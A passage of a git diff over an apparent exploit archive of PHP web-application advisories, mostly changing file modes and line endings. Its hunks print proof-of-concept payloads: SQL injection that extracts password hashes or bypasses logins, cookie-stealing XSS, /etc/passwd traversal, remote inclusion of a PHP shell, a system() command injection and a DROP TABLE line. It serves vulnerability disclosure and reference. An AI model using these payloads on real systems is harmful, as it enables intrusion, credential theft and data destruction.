+http://www.example.com/microblog/index.php?month=1&year=9999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/* \ No newline at end of file diff --git a/platforms/php/webapps/27102.txt b/platforms/php/webapps/27102.txt old mode 100755 new mode 100644 index 2c7589a72..9dec24014 --- a/platforms/php/webapps/27102.txt +++ b/platforms/php/webapps/27102.txt @@ -4,4 +4,4 @@ PowerPortal is prone to multiple cross-site scripting vulnerabilities. These iss An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/modules/links/index.php?search=[XSS]func=search_results \ No newline at end of file +http://www.example.com/modules/links/index.php?search=[XSS]func=search_results \ No newline at end of file diff --git a/platforms/php/webapps/27103.txt b/platforms/php/webapps/27103.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27104.txt b/platforms/php/webapps/27104.txt old mode 100755 new mode 100644 index c44d5fb3f..dc93083c7 --- a/platforms/php/webapps/27104.txt +++ b/platforms/php/webapps/27104.txt @@ -13,4 +13,4 @@ An attacker may also be able to exploit vulnerabilities in the underlying databa Version 2.3 is vulnerable; other versions may also be affected. A BBCode tag script-injection example has been provided: -[url]javascript:alert(123)[/url] \ No newline at end of file +[url]javascript:alert(123)[/url] \ No newline at end of file diff --git a/platforms/php/webapps/27105.txt b/platforms/php/webapps/27105.txt old mode 100755 new mode 100644 index e20ec47a8..b5634e3e7 --- a/platforms/php/webapps/27105.txt +++ b/platforms/php/webapps/27105.txt @@ -15,4 +15,4 @@ Version 2.3 is vulnerable; other versions may also be affected. An SQ- injection example has been provided: http://www.example.com/aoblogger/login.php username: username'/* -password: any \ No newline at end of file +password: any \ No newline at end of file diff --git a/platforms/php/webapps/27106.txt b/platforms/php/webapps/27106.txt old mode 100755 new mode 100644 index d340a865e..de526b11d --- a/platforms/php/webapps/27106.txt +++ b/platforms/php/webapps/27106.txt @@ -18,4 +18,4 @@ An example of new entry creation without proper authorization has been provided: <input name="uza" value=1> <input name="title" value="anytitle"> <textarea name="message">anymessage&lt;/textarea&gt; -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/php/webapps/27107.txt b/platforms/php/webapps/27107.txt old mode 100755 new mode 100644 index 40804bad8..8a83e312f --- a/platforms/php/webapps/27107.txt +++ b/platforms/php/webapps/27107.txt @@ -13,4 +13,4 @@ http://www.example.com/phpXplorer/system/action.php?sShare=guest&sAction= ../../../../../../../../../../../../etc/passwd%00 http://www.example.com/phpXplorer/system/action.php?sShare=guest&sAction= -../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/27109.txt b/platforms/php/webapps/27109.txt old mode 100755 new mode 100644 index a701e65d8..be6bc6172 --- a/platforms/php/webapps/27109.txt +++ b/platforms/php/webapps/27109.txt @@ -10,4 +10,4 @@ Reports have not specified which version is vulnerable. The current version (1.2 The following proof of concept is available: -[img]javascript:alert('XSS')[/img] \ No newline at end of file +[img]javascript:alert('XSS')[/img] \ No newline at end of file diff --git a/platforms/php/webapps/2711.php b/platforms/php/webapps/2711.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27110.txt b/platforms/php/webapps/27110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27111.txt b/platforms/php/webapps/27111.txt old mode 100755 new mode 100644 index 9ab40e244..827c01d7d --- a/platforms/php/webapps/27111.txt +++ b/platforms/php/webapps/27111.txt @@ -5,4 +5,4 @@ Eggblog is prone to multiple input validation vulnerabilities. These issues are Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. http://www.example.com/eggblog/forum/topic.php?id=N -message:<XSS> \ No newline at end of file +message:<XSS> \ No newline at end of file diff --git a/platforms/php/webapps/27112.txt b/platforms/php/webapps/27112.txt old mode 100755 new mode 100644 index c4fc8a8de..86077e104 --- a/platforms/php/webapps/27112.txt +++ b/platforms/php/webapps/27112.txt @@ -8,4 +8,4 @@ The following proof of concept URI for some of the SQL injection issues are avai http://www.example.com/viewprofile.php?id=999%20union%20select%201,2,3,4,5,6,7/* Also supplying the following to the search parameter: -aaaaa') union select 1,2,3,4,5,6/* \ No newline at end of file +aaaaa') union select 1,2,3,4,5,6/* \ No newline at end of file diff --git a/platforms/php/webapps/27114.txt b/platforms/php/webapps/27114.txt old mode 100755 new mode 100644 index c6d8729b4..cb22e8409 --- a/platforms/php/webapps/27114.txt +++ b/platforms/php/webapps/27114.txt @@ -7,4 +7,4 @@ Successful exploitation could allow an attacker to compromise the application, a The following proof of concept example is available: http://www.example.com/webspot/login.php Username: aaaa' union select 1,2,3,1,1,6, 7/* -Password: any \ No newline at end of file +Password: any \ No newline at end of file diff --git a/platforms/php/webapps/27116.txt b/platforms/php/webapps/27116.txt old mode 100755 new mode 100644 index 78fc92ca2..2fdac8506 --- a/platforms/php/webapps/27116.txt +++ b/platforms/php/webapps/27116.txt @@ -18,4 +18,4 @@ http://www.example.com/index.php?words=&where=1&submitted=true&address=E-mail+Ad http://www.example.com/ndex.php?id=-99 union select null,null,null,null,null,null,null,null,null from newsphp.pro/* -http://www.example.com/index.php?tim=-1 union select null,null,null,null,null,null,null,null,null from newsphp.pro/* \ No newline at end of file +http://www.example.com/index.php?tim=-1 union select null,null,null,null,null,null,null,null,null from newsphp.pro/* \ No newline at end of file diff --git a/platforms/php/webapps/27117.txt b/platforms/php/webapps/27117.txt old mode 100755 new mode 100644 index 549e0e062..2c1370ca8 --- a/platforms/php/webapps/27117.txt +++ b/platforms/php/webapps/27117.txt @@ -10,4 +10,4 @@ The following proof of concept is available: blogphp_username=admin -blogphp_password=imei' or '1'='1 \ No newline at end of file +blogphp_password=imei' or '1'='1 \ No newline at end of file diff --git a/platforms/php/webapps/27119.txt b/platforms/php/webapps/27119.txt old mode 100755 new mode 100644 index ed2baad4d..f9438ad35 --- a/platforms/php/webapps/27119.txt +++ b/platforms/php/webapps/27119.txt @@ -10,4 +10,4 @@ http://www.example.com/emoblog/index.php? monthy=2006017'% 20union%20select% 201 http://www.example.com/emoblog/admin/index.php username: aaa' union select 'bbb', '[md5-hash of anypass]'/* -password: [anypass] \ No newline at end of file +password: [anypass] \ No newline at end of file diff --git a/platforms/php/webapps/2712.php b/platforms/php/webapps/2712.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27120.txt b/platforms/php/webapps/27120.txt old mode 100755 new mode 100644 index 7c6732024..491dcc754 --- a/platforms/php/webapps/27120.txt +++ b/platforms/php/webapps/27120.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would be executed in the context of the a http://www.example.com/post.php?nickname="><script>alert('XSS')</script><!-- -http://www.example.com/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>" \ No newline at end of file +http://www.example.com/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>" \ No newline at end of file diff --git a/platforms/php/webapps/27121.txt b/platforms/php/webapps/27121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27122.txt b/platforms/php/webapps/27122.txt old mode 100755 new mode 100644 index de8cfbed0..12791302d --- a/platforms/php/webapps/27122.txt +++ b/platforms/php/webapps/27122.txt @@ -8,4 +8,4 @@ The following proof of concept is available: http://www.example.com/usercp.php?action=notepad -notepad=&lt;/textarea&gt;<script>alert(document.cookie)</script> \ No newline at end of file +notepad=&lt;/textarea&gt;<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/27123.txt b/platforms/php/webapps/27123.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27124.txt b/platforms/php/webapps/27124.txt old mode 100755 new mode 100644 index 7ce5d325a..d74209dff --- a/platforms/php/webapps/27124.txt +++ b/platforms/php/webapps/27124.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Version 0.3f is vulnerable; other versions may also be affected. -http://www.example.com/chat/index.php?pseudo=><script>alert(navigator.appVersion)</script>&txtlen=500&smiley=1 \ No newline at end of file +http://www.example.com/chat/index.php?pseudo=><script>alert(navigator.appVersion)</script>&txtlen=500&smiley=1 \ No newline at end of file diff --git a/platforms/php/webapps/27125.txt b/platforms/php/webapps/27125.txt old mode 100755 new mode 100644 index ce384334c..18b285deb --- a/platforms/php/webapps/27125.txt +++ b/platforms/php/webapps/27125.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/minibloggie/login.php User Name: ' or 1/* -Password: ' or 1/* \ No newline at end of file +Password: ' or 1/* \ No newline at end of file diff --git a/platforms/php/webapps/27126.txt b/platforms/php/webapps/27126.txt old mode 100755 new mode 100644 index 7598bc8cf..e4527759b --- a/platforms/php/webapps/27126.txt +++ b/platforms/php/webapps/27126.txt @@ -11,4 +11,4 @@ Add a comment Your name: <XSS> Your email address: any Website URL: javascript:[code] -Comment: <XSS> \ No newline at end of file +Comment: <XSS> \ No newline at end of file diff --git a/platforms/php/webapps/27127.txt b/platforms/php/webapps/27127.txt old mode 100755 new mode 100644 index 2e25c0d5b..17f67d6f2 --- a/platforms/php/webapps/27127.txt +++ b/platforms/php/webapps/27127.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would execute in the context of the affec GET /path/index.php HTTP/1.0 Host: host -Referer: http://<XSS>.com/; \ No newline at end of file +Referer: http://<XSS>.com/; \ No newline at end of file diff --git a/platforms/php/webapps/27128.txt b/platforms/php/webapps/27128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27129.txt b/platforms/php/webapps/27129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2713.txt b/platforms/php/webapps/2713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27130.txt b/platforms/php/webapps/27130.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27136.txt b/platforms/php/webapps/27136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27137.txt b/platforms/php/webapps/27137.txt old mode 100755 new mode 100644 index 4be7ab517..ad4b40385 --- a/platforms/php/webapps/27137.txt +++ b/platforms/php/webapps/27137.txt @@ -5,4 +5,4 @@ MyBB is prone to multiple cross-site scripting vulnerabilities. These issues are An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/mybb/search.php?action=do_search&keywords=&postthread=1&author=imei&matchusername=1&forums=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby="><script -language=javascript>alert(document.cookie)/script>&sorder=1&showresults=threads&submit=Search \ No newline at end of file +language=javascript>alert(document.cookie)/script>&sorder=1&showresults=threads&submit=Search \ No newline at end of file diff --git a/platforms/php/webapps/27138.txt b/platforms/php/webapps/27138.txt old mode 100755 new mode 100644 index 7c4816bfb..d8d6344a7 --- a/platforms/php/webapps/27138.txt +++ b/platforms/php/webapps/27138.txt @@ -7,4 +7,4 @@ Successful exploitation could allow an attacker to compromise the application, a Version 2004.09.02 is vulnerable; other versions may also be affected. -http://www.example.com/adonet/index.php?ando=comentarios&entrada=1'%20union%20select%201,2,3,4/* \ No newline at end of file +http://www.example.com/adonet/index.php?ando=comentarios&entrada=1'%20union%20select%201,2,3,4/* \ No newline at end of file diff --git a/platforms/php/webapps/27139.txt b/platforms/php/webapps/27139.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27146.txt b/platforms/php/webapps/27146.txt old mode 100755 new mode 100644 index 33b15f945..517088a70 --- a/platforms/php/webapps/27146.txt +++ b/platforms/php/webapps/27146.txt @@ -4,4 +4,4 @@ sPaiz-Nuke is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/sPaiz-Nuke/modules.php?name=Articles&file=search&query=[XSS]&type=articles&type=comments \ No newline at end of file +http://www.example.com/sPaiz-Nuke/modules.php?name=Articles&file=search&query=[XSS]&type=articles&type=comments \ No newline at end of file diff --git a/platforms/php/webapps/27147.txt b/platforms/php/webapps/27147.txt old mode 100755 new mode 100644 index afe96e035..9817511a0 --- a/platforms/php/webapps/27147.txt +++ b/platforms/php/webapps/27147.txt @@ -8,4 +8,4 @@ PmWiki is prone to multiple input-validation vulnerabilities. These issues are d These issues affect version 2.1 beta20; other versions may also be vulnerable. -http://www.example.com/pmwiki-2.1.beta20/pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://www.example.com \ No newline at end of file +http://www.example.com/pmwiki-2.1.beta20/pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/27149.txt b/platforms/php/webapps/27149.txt old mode 100755 new mode 100644 index eac3dd02a..bbd9d72da --- a/platforms/php/webapps/27149.txt +++ b/platforms/php/webapps/27149.txt @@ -8,4 +8,4 @@ Example URI have been provided: http://www.example.com/[path]/ashnews.php?page=showcomments&id=<script><script>alert(document.cookie)</script> -http://www.example.com/[path]/ashnews.php?page=showcomments&id=[xss] \ No newline at end of file +http://www.example.com/[path]/ashnews.php?page=showcomments&id=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/27153.txt b/platforms/php/webapps/27153.txt old mode 100755 new mode 100644 index adc7689b7..ef42ae0de --- a/platforms/php/webapps/27153.txt +++ b/platforms/php/webapps/27153.txt @@ -4,4 +4,4 @@ Cerberus Helpdesk is prone to a cross-site scripting vulnerability. This issue i An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/tts2/clients.php?mode=search&sid=<sidvalue>&contact_search=<script>alert('c')</script> \ No newline at end of file +http://www.example.com/tts2/clients.php?mode=search&sid=<sidvalue>&contact_search=<script>alert('c')</script> \ No newline at end of file diff --git a/platforms/php/webapps/27154.txt b/platforms/php/webapps/27154.txt old mode 100755 new mode 100644 index 12cec42fb..dc12ea0cf --- a/platforms/php/webapps/27154.txt +++ b/platforms/php/webapps/27154.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin This issue is reported to affect versions 2.1 Beta2 and earlier. -http://www.example.com/loginout.php?cmd=dir&cutepath=http://www.example.com/phpshell.txt? \ No newline at end of file +http://www.example.com/loginout.php?cmd=dir&cutepath=http://www.example.com/phpshell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/27155.txt b/platforms/php/webapps/27155.txt old mode 100755 new mode 100644 index cd3004d39..b4c8633c2 --- a/platforms/php/webapps/27155.txt +++ b/platforms/php/webapps/27155.txt @@ -9,4 +9,4 @@ Successful exploitation can allow an attacker to bypass authentication and gain MyBB 1.1.2 and prior versions are reported vulnerable to this issue. http://www.example.com/index.php?referrer=9999999999'%20UNION%20SELECT%20password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, -9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_users%20WHERE%20uid=1/* \ No newline at end of file +9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_users%20WHERE%20uid=1/* \ No newline at end of file diff --git a/platforms/php/webapps/27156.txt b/platforms/php/webapps/27156.txt old mode 100755 new mode 100644 index a4022821f..8561767c8 --- a/platforms/php/webapps/27156.txt +++ b/platforms/php/webapps/27156.txt @@ -6,4 +6,4 @@ Successful exploitation could allow an attacker to compromise the application, a http://www.example.com/szusermgnt/www/login.php Username: ' or 1/* -Password: any \ No newline at end of file +Password: any \ No newline at end of file diff --git a/platforms/php/webapps/27157.txt b/platforms/php/webapps/27157.txt old mode 100755 new mode 100644 index fda862461..d3218dbca --- a/platforms/php/webapps/27157.txt +++ b/platforms/php/webapps/27157.txt @@ -12,4 +12,4 @@ Example URIs have been provided: http://wwww.example.com/forum.php3?id_article=1&id_forum=-1/**/UNION/**/SELECT%20pass%20from%20spip_auteurs/* -http://wwww.example.com/forum.php3?id_article=-1/**/UNION/**/SELECT%20pass%20from%20spip_auteurs/* \ No newline at end of file +http://wwww.example.com/forum.php3?id_article=-1/**/UNION/**/SELECT%20pass%20from%20spip_auteurs/* \ No newline at end of file diff --git a/platforms/php/webapps/27158.txt b/platforms/php/webapps/27158.txt old mode 100755 new mode 100644 index 53eb3c801..ac348a015 --- a/platforms/php/webapps/27158.txt +++ b/platforms/php/webapps/27158.txt @@ -5,4 +5,4 @@ SPIP is prone to a cross-site scripting vulnerability. This issue is due to a fa An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. The following proof of concept URI is available: -http://www.example.com/index.php3?lang=">xss \ No newline at end of file +http://www.example.com/index.php3?lang=">xss \ No newline at end of file diff --git a/platforms/php/webapps/27162.txt b/platforms/php/webapps/27162.txt old mode 100755 new mode 100644 index 41f12a6bf..d41423f9d --- a/platforms/php/webapps/27162.txt +++ b/platforms/php/webapps/27162.txt @@ -19,4 +19,4 @@ http://www.example.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&yea http://www.example.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006"><script>alert('vul')</script>&domain=xxx&target=xxx -http://www.example.com:2095/webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ageaction=change \ No newline at end of file +http://www.example.com:2095/webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ageaction=change \ No newline at end of file diff --git a/platforms/php/webapps/27164.txt b/platforms/php/webapps/27164.txt old mode 100755 new mode 100644 index 95e90d4fc..8821828d6 --- a/platforms/php/webapps/27164.txt +++ b/platforms/php/webapps/27164.txt @@ -6,4 +6,4 @@ Successful exploitation could allow an attacker to compromise the application, a This issue is reported to affect UBB.Threads version 6.3; other versions may also be vulnerable. -http://www.example.com/showflat.php?Cat=&Number=19229%20UNION%20SELECT%201,2%20/*&page=0&view=collapsed&sb=5&o=&fpart=1 \ No newline at end of file +http://www.example.com/showflat.php?Cat=&Number=19229%20UNION%20SELECT%201,2%20/*&page=0&view=collapsed&sb=5&o=&fpart=1 \ No newline at end of file diff --git a/platforms/php/webapps/27165.txt b/platforms/php/webapps/27165.txt old mode 100755 new mode 100644 index 343e5fb12..70134d51e --- a/platforms/php/webapps/27165.txt +++ b/platforms/php/webapps/27165.txt @@ -7,4 +7,4 @@ Successful exploitation can allow an attacker to bypass authentication and gain Beehive Forum 0.6.2 is reported to be vulnerable. http://www.example.com/beehive/index.php?user_sess=k -http://www.example.com/beehive/index.php?user_sess=1+MYFORUM \ No newline at end of file +http://www.example.com/beehive/index.php?user_sess=1+MYFORUM \ No newline at end of file diff --git a/platforms/php/webapps/27166.txt b/platforms/php/webapps/27166.txt old mode 100755 new mode 100644 index fb3dc0053..c5d63580c --- a/platforms/php/webapps/27166.txt +++ b/platforms/php/webapps/27166.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary commands in the context This issue affects eyeOS version 0.8.9 and earlier. -http://www.example.com/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo(); \ No newline at end of file +http://www.example.com/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo(); \ No newline at end of file diff --git a/platforms/php/webapps/27167.txt b/platforms/php/webapps/27167.txt old mode 100755 new mode 100644 index 2628be899..cd0585951 --- a/platforms/php/webapps/27167.txt +++ b/platforms/php/webapps/27167.txt @@ -9,4 +9,4 @@ Note that an attacker must have sufficient message moderation and merging privil MyBB version 1.0.3 is reported to be vulnerable. http://www.example.com/mybb/moderation.php?posts=[firstpid]|[secondpid]?[SQL] -&tid=[containertid]&action=do_multimergeposts&sep=hr \ No newline at end of file +&tid=[containertid]&action=do_multimergeposts&sep=hr \ No newline at end of file diff --git a/platforms/php/webapps/2717.txt b/platforms/php/webapps/2717.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27170.txt b/platforms/php/webapps/27170.txt old mode 100755 new mode 100644 index 97e653987..f8f588f16 --- a/platforms/php/webapps/27170.txt +++ b/platforms/php/webapps/27170.txt @@ -5,4 +5,4 @@ The vwdev application is prone to an SQL-injection vulnerability. This issue is Successful exploitation can allow an attacker to bypass authentication, modify data, or exploit vulnerabilities in the underlying database implementation. Other attacks may also be possible. http://www.example.com/index.php?Page=definition&UID=2;[SQLINJECTION] -http://www.example.com/index.php?Page=definition&UID=2;Drop Table Docs; -- \ No newline at end of file +http://www.example.com/index.php?Page=definition&UID=2;Drop Table Docs; -- \ No newline at end of file diff --git a/platforms/php/webapps/27172.txt b/platforms/php/webapps/27172.txt old mode 100755 new mode 100644 index 8143e830b..f76a7baff --- a/platforms/php/webapps/27172.txt +++ b/platforms/php/webapps/27172.txt @@ -11,4 +11,4 @@ Version 1.8.2g and earlier are vulnerable; other versions may also be affected. http://www.example.com/spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00 http://www.example.com/spip_acces_doc.php3?id_document=0&file=<?system($_GET[cmd]);?> -http://www.example.com/spip_rss.php?cmd=ls%20-la&GLOBALS[type_urls]=/../ecrire/data/spip.log%00 \ No newline at end of file +http://www.example.com/spip_rss.php?cmd=ls%20-la&GLOBALS[type_urls]=/../ecrire/data/spip.log%00 \ No newline at end of file diff --git a/platforms/php/webapps/27173.txt b/platforms/php/webapps/27173.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27175.php b/platforms/php/webapps/27175.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27176.txt b/platforms/php/webapps/27176.txt old mode 100755 new mode 100644 index b56e5d307..2876d5690 --- a/platforms/php/webapps/27176.txt +++ b/platforms/php/webapps/27176.txt @@ -10,4 +10,4 @@ http://www.example.com/guestbook.php?menuid=<script>alert('HELLO');</script> http://www.example.com/index.php?menuid=<script>alert(document.cookie);</script> http://www.example.com/inhalt.php?menuid=<script>alert(document.cookie);</script> http://www.example.com/forum.php?menuid=<script>alert('HELLO');</script> -http://www.example.com/kontakt.php?menuid=<script>alert('HELLO');</script> \ No newline at end of file +http://www.example.com/kontakt.php?menuid=<script>alert('HELLO');</script> \ No newline at end of file diff --git a/platforms/php/webapps/2718.txt b/platforms/php/webapps/2718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27183.txt b/platforms/php/webapps/27183.txt old mode 100755 new mode 100644 index 5e049c52f..288a32ff8 --- a/platforms/php/webapps/27183.txt +++ b/platforms/php/webapps/27183.txt @@ -6,4 +6,4 @@ An attacker can exploit the directory-traversal vulnerability to retrieve arbitr The local file-include vulnerability lets the attacker include arbitrary local files. The impact of this issue depends on the content of the files included. If an attacker can place a malicious script on the vulnerable computer (either through legitimate means or through other latent vulnerabilities), then the attacker may be able to execute arbitrary code in the context of the webserver process. The attacker may also be able to use existing scripts to perform some malicious activity. -http://www.example.com/show_archives.php?template=/../../[local-file]%00 \ No newline at end of file +http://www.example.com/show_archives.php?template=/../../[local-file]%00 \ No newline at end of file diff --git a/platforms/php/webapps/27184.txt b/platforms/php/webapps/27184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27185.txt b/platforms/php/webapps/27185.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27186.txt b/platforms/php/webapps/27186.txt old mode 100755 new mode 100644 index a7431aae3..2dc445ef6 --- a/platforms/php/webapps/27186.txt +++ b/platforms/php/webapps/27186.txt @@ -8,4 +8,4 @@ The cross-site scripting vulnerabilities may permit a remote attacker to steal c The SQL-injection issues are the result of the application's failure to properly sanitize user-supplied input that will be included in SQL queries. Successful exploitation of SQL-injection vulnerabilities could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/index.php/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file +http://www.example.com/index.php/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/2719.php b/platforms/php/webapps/2719.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27190.txt b/platforms/php/webapps/27190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27192.txt b/platforms/php/webapps/27192.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27193.txt b/platforms/php/webapps/27193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27194.txt b/platforms/php/webapps/27194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27195.txt b/platforms/php/webapps/27195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27197.txt b/platforms/php/webapps/27197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27198.txt b/platforms/php/webapps/27198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27199.txt b/platforms/php/webapps/27199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27200.txt b/platforms/php/webapps/27200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27201.txt b/platforms/php/webapps/27201.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27202.txt b/platforms/php/webapps/27202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27204.html b/platforms/php/webapps/27204.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27205.html b/platforms/php/webapps/27205.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27206.txt b/platforms/php/webapps/27206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27207.txt b/platforms/php/webapps/27207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27208.txt b/platforms/php/webapps/27208.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27209.txt b/platforms/php/webapps/27209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2721.php b/platforms/php/webapps/2721.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27213.txt b/platforms/php/webapps/27213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27214.txt b/platforms/php/webapps/27214.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27215.txt b/platforms/php/webapps/27215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27216.txt b/platforms/php/webapps/27216.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27217.txt b/platforms/php/webapps/27217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27218.txt b/platforms/php/webapps/27218.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27219.txt b/platforms/php/webapps/27219.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27220.txt b/platforms/php/webapps/27220.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27221.txt b/platforms/php/webapps/27221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27222.txt b/platforms/php/webapps/27222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27223.txt b/platforms/php/webapps/27223.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27224.txt b/platforms/php/webapps/27224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27225.txt b/platforms/php/webapps/27225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27226.txt b/platforms/php/webapps/27226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27227.txt b/platforms/php/webapps/27227.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27228.txt b/platforms/php/webapps/27228.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27229.txt b/platforms/php/webapps/27229.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27230.txt b/platforms/php/webapps/27230.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27236.txt b/platforms/php/webapps/27236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27237.txt b/platforms/php/webapps/27237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27238.php b/platforms/php/webapps/27238.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27239.txt b/platforms/php/webapps/27239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2724.txt b/platforms/php/webapps/2724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27240.txt b/platforms/php/webapps/27240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27242.txt b/platforms/php/webapps/27242.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27243.txt b/platforms/php/webapps/27243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27245.txt b/platforms/php/webapps/27245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27247.txt b/platforms/php/webapps/27247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27248.txt b/platforms/php/webapps/27248.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27249.html b/platforms/php/webapps/27249.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2725.txt b/platforms/php/webapps/2725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27250.txt b/platforms/php/webapps/27250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/27251.txt b/platforms/php/webapps/27251.txt old mode 100755 new mode 100644 